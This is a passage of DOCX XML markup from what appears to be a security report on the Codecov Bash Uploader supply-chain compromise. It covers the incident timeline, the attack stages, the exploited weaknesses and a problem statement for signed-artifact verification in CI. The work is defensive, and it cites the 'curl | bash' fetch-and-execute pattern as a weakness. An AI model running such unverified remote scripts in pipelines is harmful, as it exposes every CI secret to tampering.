        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1927"/>
        <w:gridCol w:w="7030"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Event (documented)</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Before 31 Jan 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A credential able to modify the uploader is exposed through an error in the Docker image creation process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31 Jan 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>First unauthorised modification of the Bash Uploader; further periodic modifications follow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Feb to Mar 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Customer pipelines download and execute the modified script; CI data is sent to a third-party server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1 Apr 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A customer reports a checksum mismatch; Codecov begins its investigation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15 Apr 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Public disclosure; customers told to rotate exposed credentials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Apr 2021 onwards</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7030"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Downstream disclosures and investigations, e.g. HashiCorp rotates its GPG signing key [3]; press reports of wider impact [2].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.3 Attack Vector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760000" cy="1099419"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="codecov_attack.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="1099419"/>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3.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Attack flow of the documented Codecov incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack had four stages. First, a credential was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> through a build artifact. Second, the released file was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>modified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in cloud storage using that credential. Third, the file was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>distributed from the trusted domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> over HTTPS. Fourth, it was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>executed with privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside customers' CI, where it could read every secret in the environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.4 Vulnerabilities Exploited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 3.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vulnerabilities exploited</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="680"/>
        <w:gridCol w:w="4649"/>
        <w:gridCol w:w="3628"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Consequence</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V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Secret material recoverable from a published build artifact (Docker image)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Attacker obtains a working storage credential</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V2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Write access to storage was enough to change a production release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Release integrity rested on one secret</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V3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Customers executed the script without cryptographic verification (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl | bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tampering is invisible to customers</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V4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Published checksum was not bound to a vendor signature, and checking was manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A hash that can be replaced or skipped gives no authenticity</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V5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Script ran with access to every CI secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>One line exposes all credentials</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V6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>No automatic, per-download verification or monitoring of release content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Compromise persisted for about two months</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.5 Why TLS and a Published Checksum Were Not Enough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS authenticates the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and protects bytes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in transit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. It cannot tell whether the file stored on that server is the one the vendor released. In the incident, the malicious file was on the legitimate server, so HTTPS delivered it faithfully. A published SHA-256 checksum detects a change only if the customer checks it on every run and the checksum itself is authentic. An attacker who can replace the file can often replace an unsigned checksum as well. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hashing gives integrity relative to a reference value; only a digital signature verified with a trusted public key gives authenticity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.6 Problem Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Design and implement a mechanism that lets a customer's CI/CD pipeline automatically verify, before executing or deploying a vendor artifact, that (i) the artifact is exactly the one the vendor released, (ii) the release manifest was signed by a trusted, non-revoked vendor key, (iii) the release satisfies the customer's admission policy (trusted signer, allowed key, non-revoked and non-obsolete version, approved source repository, passed security tests), and (iv) its provenance matches the artifact. Any failure must stop the pipeline and be recorded, even if the storage bucket or network is compromised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.7 Scope and Assumptions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The storage bucket, CDN, mirrors and network are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>untrusted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: an attacker may modify any file there, exactly as in the incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Customers obtain the vendor's trusted public keys and admission policy through an authentic channel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In production, the vendor's private signing key is protected by an HSM or cloud KMS; the prototype uses PEM key files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>All attack simulations are local. They never contact Codecov or any external system, and the injected payload is never executed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
